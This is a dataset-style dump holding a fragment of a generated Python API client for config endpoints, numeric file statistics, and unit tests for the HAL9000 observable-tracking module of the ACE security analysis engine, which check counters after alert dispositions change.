['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/config', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Config', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_config(self, **kwargs): # noqa: E501
"""update_config # noqa: E501
This method allows applications to create a new configuration or update an existing configuration. This app-level configuration allows developers to set up alerts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_config(async_req=True)
>>> result = thread.get()
:param async_req bool
:param Config body: The configurations for this application.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_config_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.update_config_with_http_info(**kwargs) # noqa: E501
return data
def update_config_with_http_info(self, **kwargs): # noqa: E501
"""update_config # noqa: E501
This method allows applications to create a new configuration or update an existing configuration. This app-level configuration allows developers to set up alerts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_config_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param Config body: The configurations for this application.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_config" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/config', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 36.731132
| 442
| 0.621163
| 908
| 7,787
| 5.10022
| 0.197137
| 0.044915
| 0.024185
| 0.031095
| 0.800043
| 0.784712
| 0.784712
| 0.768301
| 0.760527
| 0.75664
| 0
| 0.015824
| 0.293951
| 7,787
| 211
| 443
| 36.905213
| 0.826482
| 0.402979
| 0
| 0.704762
| 0
| 0
| 0.133886
| 0.03128
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.038095
| 0
| 0.152381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aacc6003dda7d0f113232d2ad8f543a975d4a6fa
| 13,098
|
py
|
Python
|
lib/saq/modules/test_hal9000.py
|
krayzpipes/ACE-1
|
138bf2aecad949f0b72b66519c32893df033de39
|
[
"Apache-2.0"
] | 28
|
2018-08-08T11:57:31.000Z
|
2022-01-12T23:06:18.000Z
|
lib/saq/modules/test_hal9000.py
|
krayzpipes/ACE-1
|
138bf2aecad949f0b72b66519c32893df033de39
|
[
"Apache-2.0"
] | 108
|
2018-08-08T12:35:06.000Z
|
2019-07-19T22:57:19.000Z
|
lib/saq/modules/test_hal9000.py
|
krayzpipes/ACE-1
|
138bf2aecad949f0b72b66519c32893df033de39
|
[
"Apache-2.0"
] | 16
|
2018-08-03T18:48:00.000Z
|
2021-11-09T00:35:35.000Z
|
# vim: sw=4:ts=4:et
import logging
import saq
import saq.database
import saq.test
from saq.analysis import RootAnalysis
from saq.database import use_db, get_db_connection, set_dispositions
from saq.constants import *
from saq.test import *
from saq.util import *
from .hal9000 import HAL9000Analysis, _compute_hal9000_md5, \
KEY_MAL_COUNT, KEY_TOTAL_COUNT, STATE_KEY_ID_TRACKING, STATE_KEY_PREVIOUS_DISPOSITION
class TestCase(ACEModuleTestCase):
@use_db(name='hal9000')
def test_hal9000_no_alert(self, db, c):
root = create_root_analysis(analysis_mode=ANALYSIS_MODE_ANALYSIS)
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test')
root.save()
root.schedule()
engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS ])
#engine.set_cleanup(ANALYSIS_MODE_ANALYSIS, False)
engine.enable_module('analysis_module_hal9000', ANALYSIS_MODE_ANALYSIS)
engine.controlled_stop()
engine.start()
engine.wait()
self.assertFalse(os.path.exists(root.storage_dir))
c.execute("SELECT total_count, mal_count FROM observables")
rows = c.fetchall()
self.assertEquals(len(rows), 1)
result = rows[0]
self.assertIsNotNone(result)
self.assertEquals(result[0], 1)
self.assertEquals(result[1], 0)
@use_db(name='hal9000')
def test_hal9000_alert_no_disposition(self, db, c):
# same as above except we end up alerting
root = create_root_analysis(analysis_mode=ANALYSIS_MODE_ANALYSIS)
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test')
root.save()
root.schedule()
engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS, ANALYSIS_MODE_CORRELATION ])
engine.enable_alerting()
engine.set_cleanup(ANALYSIS_MODE_ANALYSIS, False)
engine.enable_module('analysis_module_forced_detection', ANALYSIS_MODE_ANALYSIS)
engine.enable_module('analysis_module_hal9000', [ ANALYSIS_MODE_ANALYSIS, ANALYSIS_MODE_CORRELATION ])
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=storage_dir_from_uuid(root.uuid))
root.load()
# make sure we alerted
self.assertEquals(root.analysis_mode, ANALYSIS_MODE_CORRELATION)
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
analysis = test_observable.get_analysis(HAL9000Analysis)
self.assertIsNotNone(analysis)
# total count and mal count should both be 0
self.assertEquals(analysis.total_count, 0)
self.assertEquals(analysis.mal_count, 0)
# we should have a single entry in the database for this observable
hal9000_id = _compute_hal9000_md5(test_observable)
# since we have NOT set a disposition yet we should have nothing in the database about it
c.execute("SELECT total_count, mal_count FROM observables WHERE id = UNHEX(%s)", (hal9000_id,))
result = c.fetchone()
self.assertIsNone(result)
# verify the correct state is kept
state = root.state['hal9000']
self.assertTrue(STATE_KEY_ID_TRACKING in state)
tracking = state[STATE_KEY_ID_TRACKING]
self.assertTrue(hal9000_id in tracking)
tracking_info = tracking[hal9000_id]
self.assertTrue('id' in tracking_info)
self.assertEquals(tracking_info['id'], test_observable.id)
self.assertTrue(KEY_TOTAL_COUNT in tracking_info)
self.assertTrue(KEY_MAL_COUNT in tracking_info)
# we have not made any changes yet either
self.assertIsNone(tracking_info[KEY_TOTAL_COUNT])
self.assertIsNone(tracking_info[KEY_MAL_COUNT])
@use_db(name='hal9000')
def test_hal9000_alert_mal_disposition(self, db, c):
# same as above except we end up alerting and disposition as malicious
root = create_root_analysis(analysis_mode=ANALYSIS_MODE_ANALYSIS)
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test')
root.save()
root.schedule()
engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS,
ANALYSIS_MODE_CORRELATION,
ANALYSIS_MODE_DISPOSITIONED ])
engine.set_cleanup(ANALYSIS_MODE_ANALYSIS, False)
engine.enable_alerting()
engine.enable_module('analysis_module_forced_detection', ANALYSIS_MODE_ANALYSIS)
engine.enable_module('analysis_module_hal9000', [ ANALYSIS_MODE_ANALYSIS,
ANALYSIS_MODE_CORRELATION,
ANALYSIS_MODE_DISPOSITIONED ])
engine.controlled_stop()
engine.start()
engine.wait()
# set the disposition for the alert
set_dispositions([root.uuid], DISPOSITION_DELIVERY, UNITTEST_USER_ID)
# run the engine again so that is processes the alert in correlation mode with the disposition set
engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS,
ANALYSIS_MODE_CORRELATION,
ANALYSIS_MODE_DISPOSITIONED ])
engine.enable_alerting()
engine.enable_module('analysis_module_forced_detection', ANALYSIS_MODE_ANALYSIS)
engine.enable_module('analysis_module_hal9000', [ ANALYSIS_MODE_ANALYSIS,
ANALYSIS_MODE_CORRELATION,
ANALYSIS_MODE_DISPOSITIONED ])
engine.controlled_stop()
engine.start()
engine.wait()
# storage dir changes when it turns into alert
root = RootAnalysis(storage_dir=storage_dir_from_uuid(root.uuid))
root.load()
# make sure we alerted
self.assertEquals(root.analysis_mode, ANALYSIS_MODE_DISPOSITIONED)
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
analysis = test_observable.get_analysis(HAL9000Analysis)
self.assertIsNotNone(analysis)
# these should still both be 0
self.assertEquals(analysis.total_count, 0)
self.assertEquals(analysis.mal_count, 0)
# we should have a single entry in the database for this observable
hal9000_id = _compute_hal9000_md5(test_observable)
# with the disposition set we should have the corresponding values
c.execute("SELECT total_count, mal_count FROM observables WHERE id = UNHEX(%s)", (hal9000_id,))
result = c.fetchone()
db.commit()
self.assertIsNotNone(result)
self.assertEquals(result[0], 1)
self.assertEquals(result[1], 1)
# verify the correct state is kept
state = root.state['hal9000']
self.assertTrue(STATE_KEY_ID_TRACKING in state)
tracking = state[STATE_KEY_ID_TRACKING]
self.assertTrue(hal9000_id in tracking)
tracking_info = tracking[hal9000_id]
self.assertTrue('id' in tracking_info)
self.assertEquals(tracking_info['id'], test_observable.id)
self.assertTrue(KEY_TOTAL_COUNT in tracking_info)
self.assertTrue(KEY_MAL_COUNT in tracking_info)
# we should be tracking the change we made in here
self.assertIsNotNone(tracking_info[KEY_TOTAL_COUNT])
self.assertIsNotNone(tracking_info[KEY_MAL_COUNT])
# now we change it to FP
set_dispositions([root.uuid], DISPOSITION_FALSE_POSITIVE, UNITTEST_USER_ID)
# run the engine again so that is processes the alert in the new correlation mode with the disposition changed
engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS,
ANALYSIS_MODE_CORRELATION,
ANALYSIS_MODE_DISPOSITIONED ])
engine.enable_alerting()
engine.enable_module('analysis_module_forced_detection', ANALYSIS_MODE_ANALYSIS)
engine.enable_module('analysis_module_hal9000', [ ANALYSIS_MODE_ANALYSIS,
ANALYSIS_MODE_CORRELATION,
ANALYSIS_MODE_DISPOSITIONED ])
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=storage_dir_from_uuid(root.uuid))
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
analysis = test_observable.get_analysis(HAL9000Analysis)
self.assertIsNotNone(analysis)
# these should still both be 0
self.assertEquals(analysis.total_count, 0)
self.assertEquals(analysis.mal_count, 0)
# we should have a single entry in the database for this observable
hal9000_id = _compute_hal9000_md5(test_observable)
# with the disposition set we should have the corresponding values
c.execute("SELECT total_count, mal_count FROM observables WHERE id = UNHEX(%s)", (hal9000_id,))
result = c.fetchone()
db.commit()
self.assertIsNotNone(result)
self.assertEquals(result[0], 1)
self.assertEquals(result[1], 0) # <-- should be 0 now that it's set to FP
# verify the correct state is kept
state = root.state['hal9000']
self.assertTrue(STATE_KEY_ID_TRACKING in state)
tracking = state[STATE_KEY_ID_TRACKING]
self.assertTrue(hal9000_id in tracking)
tracking_info = tracking[hal9000_id]
self.assertTrue('id' in tracking_info)
self.assertEquals(tracking_info['id'], test_observable.id)
self.assertTrue(KEY_TOTAL_COUNT in tracking_info)
self.assertTrue(KEY_MAL_COUNT in tracking_info)
# we should be tracking the change we made in here
self.assertIsNotNone(tracking_info[KEY_TOTAL_COUNT])
self.assertIsNone(tracking_info[KEY_MAL_COUNT])
# finally we change it to ignore, which should entirely remove the counters (set them to 0 anyways)
set_dispositions([root.uuid], DISPOSITION_IGNORE, UNITTEST_USER_ID)
# run the engine again so that is processes the alert in the new correlation mode with the disposition changed
engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS,
ANALYSIS_MODE_CORRELATION,
ANALYSIS_MODE_DISPOSITIONED ])
engine.enable_alerting()
engine.enable_module('analysis_module_forced_detection', ANALYSIS_MODE_ANALYSIS)
engine.enable_module('analysis_module_hal9000', [ ANALYSIS_MODE_ANALYSIS,
ANALYSIS_MODE_CORRELATION,
ANALYSIS_MODE_DISPOSITIONED ])
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=storage_dir_from_uuid(root.uuid))
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
analysis = test_observable.get_analysis(HAL9000Analysis)
self.assertIsNotNone(analysis)
# these should still both be 0
self.assertEquals(analysis.total_count, 0)
self.assertEquals(analysis.mal_count, 0)
# we should have a single entry in the database for this observable
hal9000_id = _compute_hal9000_md5(test_observable)
# with the disposition set we should have the corresponding values
c.execute("SELECT total_count, mal_count FROM observables WHERE id = UNHEX(%s)", (hal9000_id,))
result = c.fetchone()
db.commit()
self.assertIsNotNone(result)
self.assertEquals(result[0], 0) # <-- now both should be set to 0
self.assertEquals(result[1], 0)
# verify the correct state is kept
state = root.state['hal9000']
self.assertTrue(STATE_KEY_ID_TRACKING in state)
tracking = state[STATE_KEY_ID_TRACKING]
self.assertTrue(hal9000_id in tracking)
tracking_info = tracking[hal9000_id]
self.assertTrue('id' in tracking_info)
self.assertEquals(tracking_info['id'], test_observable.id)
self.assertTrue(KEY_TOTAL_COUNT in tracking_info)
self.assertTrue(KEY_MAL_COUNT in tracking_info)
# we should be tracking the change we made in here
self.assertIsNone(tracking_info[KEY_TOTAL_COUNT])
self.assertIsNone(tracking_info[KEY_MAL_COUNT])
| 44.25
| 118
| 0.654756
| 1,488
| 13,098
| 5.497312
| 0.110887
| 0.070416
| 0.06846
| 0.034963
| 0.88802
| 0.863936
| 0.863936
| 0.854523
| 0.845966
| 0.832641
| 0
| 0.02232
| 0.274851
| 13,098
| 295
| 119
| 44.4
| 0.838913
| 0.137426
| 0
| 0.839024
| 0
| 0
| 0.061179
| 0.026461
| 0
| 0
| 0
| 0
| 0.317073
| 1
| 0.014634
| false
| 0
| 0.04878
| 0
| 0.068293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.